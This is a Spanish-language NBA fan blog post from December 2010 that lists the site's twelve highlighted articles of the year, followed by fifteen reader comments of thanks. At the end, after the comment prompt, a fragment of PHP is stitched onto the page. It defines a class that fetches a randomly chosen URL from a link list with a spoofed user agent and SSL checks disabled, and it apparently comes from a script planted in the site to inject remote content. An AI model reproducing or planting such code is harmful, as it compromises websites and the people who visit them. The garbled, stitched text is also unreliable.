2010, mejorando lo imposible

27 de December de 2010 por txusma

Ya se ha convertido en tradición que cada final de año escojamos 12 artículos entre todos los publicados. Lo hicimos por primera vez en 2008 y lo volvimos a hacer en 2009. Hacerlo de nuevo significa que llevamos más de 3 años al pie del cañón. Si alguien nos hubiera dicho aquel 18 de Septiembre de 2007 que 3 años después el blog continuaría activo y con mejor salud que nunca, no le hubiéramos creído. Pero resulta que es totalmente cierto. Desde el primer día hemos recibido más de 290.000 visitas y hemos servido más de 600.000 páginas, que se dice pronto. Actualmente, superamos con facilidad las 500 visitas diarias, hecho que nos llena de orgullo pero también de cierto sentido de la responsabilidad ya que nos gusta hacer bien las cosas y en ocasiones dudamos de nosotros mismos. Una vez más gracias a todos los que nos visitáis cada día y sobretodo a los que enriquecen el blog con sus aportaciones y comentarios.

Y sin más dilación vayamos con esos 12 artículos del 2010:

Análisis 2010/2011: Hablar del inicio de la temporada NBA es hablar de los análisis de tjnba.com. Además, este año nos han echado una mano gente como Kantonyo o Sergio así que lo destacamos por partida doble.

Mock Draft 2010: Colofón a una serie de artículos de Kantonyo acercándonos la NCAA. Por favor, no os perdáis esas fotografías retocadas para ayudarnos a imaginar como les quedaría a los rookies sus posibles futuros uniformes.

Historia de la NBA: No destacamos un artículo sinó una serie de artículos. Nuestro colaborador Sergio se ha convertido ya en una referencia cuando se habla sobre la NBA, sobretodo de su pasado. Pecado perderse cualquiera de sus publicaciones.

Análisis de las Finales 2010: LA Lakers vs Boston Celtics: Es incluso lógico que este sea el post más visitado del año. Un análisis concienzudo, objetivo y brillantemente escrito por MagicJohnson32. ¿A alquien no le entraron unas ganas bárbaras de que diera inicio la final después de leerlo?

Los 10 mejores de la década. Nº 01: Después de 9 artículos a cada cual mejor, el último de la serie nos presentó al que, para Viva_Dirk, era el mejor jugador de la década. Artículos como estos son los que más nos gustan a todos ya que nos permiten debatir y opinar sin descanso.

La Crónica (22/03/2010): Una crónica cualquiera que desató el segundo mayor número de comentarios recibido por cualquier otro artículo de este año. ¿El “culpable”? Lemontus y su amor incondicional por los Bucks.

Vuelve la porra de TJNBA.COM: Este año hemos roto todos los récords. 76 personas compiten este año para proclamarse oficialmente “el hombre/mujer que más entiende de NBA del mundo”. De momento, si alguno apostó por los Nets en playoffs que sepa que perderá un punto.

Los codiciados agentes libres de este verano: El verano de 2010 estaba marcado en la agenda de muchos equipos de la NBA. Lebron James, Dywane Wade, Chris Bosh, Amare Stoudamire, Carlos Boozer… eran sólo parte de los nombres que llenaban titulares y alimentaban la rumorología. En este artículo Txusma nos presentaba la lista de los jugadores que podían cambiar de equipo. La cosa interesaba porque se dejaron más de 50 comentarios en este artículo y también en la noticia del fichaje de Lebron por los Miami Heat.

Trivial #24: Lucky Lakers: El último trivial hasta el momento. Estamos pendientes de reiniciar esta historia ahora que somos aún más que el año pasado. En 2011 nos ponemos.

Las notas de fin de curso 2009/10: Excelentes: Si hay alguien que tiene realmente la culpa de que el blog haya crecido en este último año ese es, sin duda, TheDeerHunter. Participa en la redacción de todas las crónicas, hace informes mensuales, analiza los equipos, se curra artículos especiales de vez en cuando… Crack, con mayúsculas.

Mundobasket 2010: Final: EEUU se paseó de la mano de un Kevin Durant que se dio a conocer al gran público. España finalizó sexta y Pau Gasol lo vivió desde la cabina de comentaristas.

Los nuevos uniformes de la 2010-2011: Año nuevo, vestiditos nuevos. Varias franquicias han cambiado sus uniformes y Faju nos lo explicó en este artículo. La NBA se puede vivir desde muchas ópticas diferentes.

¡Feliz año 2011 a todos!

Comenta

15 comentarios a esta entrada

  1. sergio dice:
    #1

    Es un orgullo aportar un pequeño granito de arena cuando me es posible… que es menos de lo que me gustaría. Sois todos unos cracks y este es sin duda el mejor blog de NBA en castellano que he visto. Mi enhorabuena chicos. Seguid asi

    Felices fiestas a todos.

      Citar

  2. Sempren dice:
    #2

    ¿Dudar de vosotros mismos? Os sigo desde hace más de un año con frecuencia diaria, y no veo motivos para que dudéis de vosotros, la verdad.

    Ánimo, que hacéis un trabajo fabuloso con el blog.
    Un saludo, y muchas gracias por todo.

      Citar

  3. TheDeerHunter dice:
    #3

    Sólo decir que encantado de estar un año más por aquí compartiendo esta afición con vosotros.
    Ójala el blog pueda crecer y puedan haber todos los años incorporaciones como las de Sergio o Kantonyo para que eso suceda.

    A Txusma se le ha olvidado mencionar al más importante de todos… que es precisamente él en todo este asunto. El jefe… que no me sube el sueldo ni a tiros y eso que lo tiene fácil.

      Citar

  4. Busky23 dice:
    #4

    Llevo dos temporadas y media siguiendo a diario vuestras crónicas,informes…y hasta hace poco no me había animado a participar.
    Encontré el blog gracias a Txusma cuando dejaba el enlace en el blog de Daimiel.
    Lo que hace este blog diferente a los demás es el alto conocimiento de la liga de prácticamente todo el mundo que participa y siempre opiniones desde el respeto y sin entrar en insultos ni guerras absurdas entre blogueros.
    La verdad que da gusto poder compartir opiniones y debatir sobre este juego que tanto nos apasiona.
    Seguid así y mi mas profundo agradecimiento por vuestro trabajo a diario,en especial a TheDeerHunter que aparte d estar SIEMPRE al pie del cañón comparto casi siempre su forma de ver el día a día de la liga.
    Saludos,felices fiestas y que tengamos blogtjnba por muchos años.

      Citar

  5. HeiNeKeN dice:
    #5

    Llevo siguiendo el blog desde hace año y medio, aunque no escriba demasiado, es la primera pagina que abro al levantarme para enterarme de lo sucedido en las Americas xD.

    Seguid asi por mucho tiempo.Enhorabuena.

      Citar

  6. sayim dice:
    #6

    Enhorabuena a todos los que participáis en el blog, especialmente a los que os curráis los artículos. Además de todo el conocimiento “nbaniano” que tenéis, lo que más me llama la atención es la “calidad” de la mayoría de las redacciones, lo que es bastante destacable siendo un grupo amateur y viendo el nivel medio del periodismo de este país. Si yo fuera el as o el marca contrataría a un par de ellos de vosotros (todos sabemos más o menos a quien) para desarrollar toda la información de baloncesto con gente que sabe bastante más que sus redactores y se leyeron más de un libro en su vida y se nota en su capacidad narrativa.

    Sin más jabón, que me está quedando “ñoño, bonito, pero un poco ñoño”, seguid así.

    Sólo desear Felices fiestas y próspero año a todos los especímenes que dedican unos minutos al día a seguir la NBA desde aquí

    Un saludo

      Citar

  7. JHC dice:
    #7

    otro k os sigue dia a dia aunke participe poco me encanta vuestro blog desde k lo descubri es raro el dia k no lo visite solo desearos una feliz navidad a los que haceis un poco mas facil estar enterado de todo lo referente a la nba… y a todos los demas k leais el foro

    Feliz Navidad a Todos!!

      Citar

  8. CAMPO2 dice:
    #8

    Gran Blog y Gran Gente que pasa por aqui tanto para escribir los articulos como para dejar sus opiniones al respecto, y es de apreciar que si algun momento ha habido alguien que no ha sabido del mundo NBA porque se acababa de enganchar se le ha abierto la puerta para que entre y aprenda y no se le ha cerrado en las narices, asi se hacen grandes los Blogs

      Citar

  9. rojorob dice:
    #9

    No os conozco personalmente, pero supongo que tiene que ser una pasada empezar a escribir un blog con los colegas y llegar a recibir tantos y tan buenos comentarios y agradecimientos. Merecidos son y aquí va el mío. ENHORABUENA!!!

      Citar

  10. Scriers dice:
    #10

    Enhorabuena. Para mí el blog por excelencia de nba en españa. Hay muchos, pero este es el que más mola y el que mas cariño transpira.

      Citar

  11. TheAnswer dice:
    #11

    Seguid así, sois una visita obligada cada día

      Citar

  12. Rompe dice:
    #12

    Enhorabuena a todos y a seguir así! Todas las mañanas es una visita obligada en cuanto enciendo el ordenador. Y a media tarde leer todos los comentarios, por supuesto!

      Citar

  13. German dice:
    #13

    Descubri el blog hace unos diez dias, es excelente realmente, felicito a todos los que lo hacen posible! Da gusto ver un blog tan bien informado y actualizado. Felicidades y un saludo desde Argentina!

      Citar

  14. kantonyo dice:
    #14

    Hace unos meses que no escribo mucho porque he estado muy liado, pero os sigo leyendo todos los días, todos los artículos y todos los comentarios… Dentro de poco me pondré con los artículos de la NCAA, donde ya empiezan a despuntar las jóvenes promesas que dentro de unos años todo el mundo conocerá.

    Realmente los verdaderos cracks de todo esto son Txusma y TheDeerHunter, que a pesar de tener que actualizar el blog todos los días no descuidan ni un solo detalle.

    Felices fiestas a todos, y larga vida al Blog!!!

      Citar

  15. RusticoColorao dice:
    #15

    Feliz 2011 para tod@s!!!!!!!! Al nuevo año le pido un poco más de tiempo para poder dedicarle a este pedazo de blog que se inició por la cabezonería del gran Txusma, un grande entre los grandes, sobre todo en persona.

    Y a los del AS/Marca… que contraten a Magic y a Gallis!!!!!!!!!!!!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>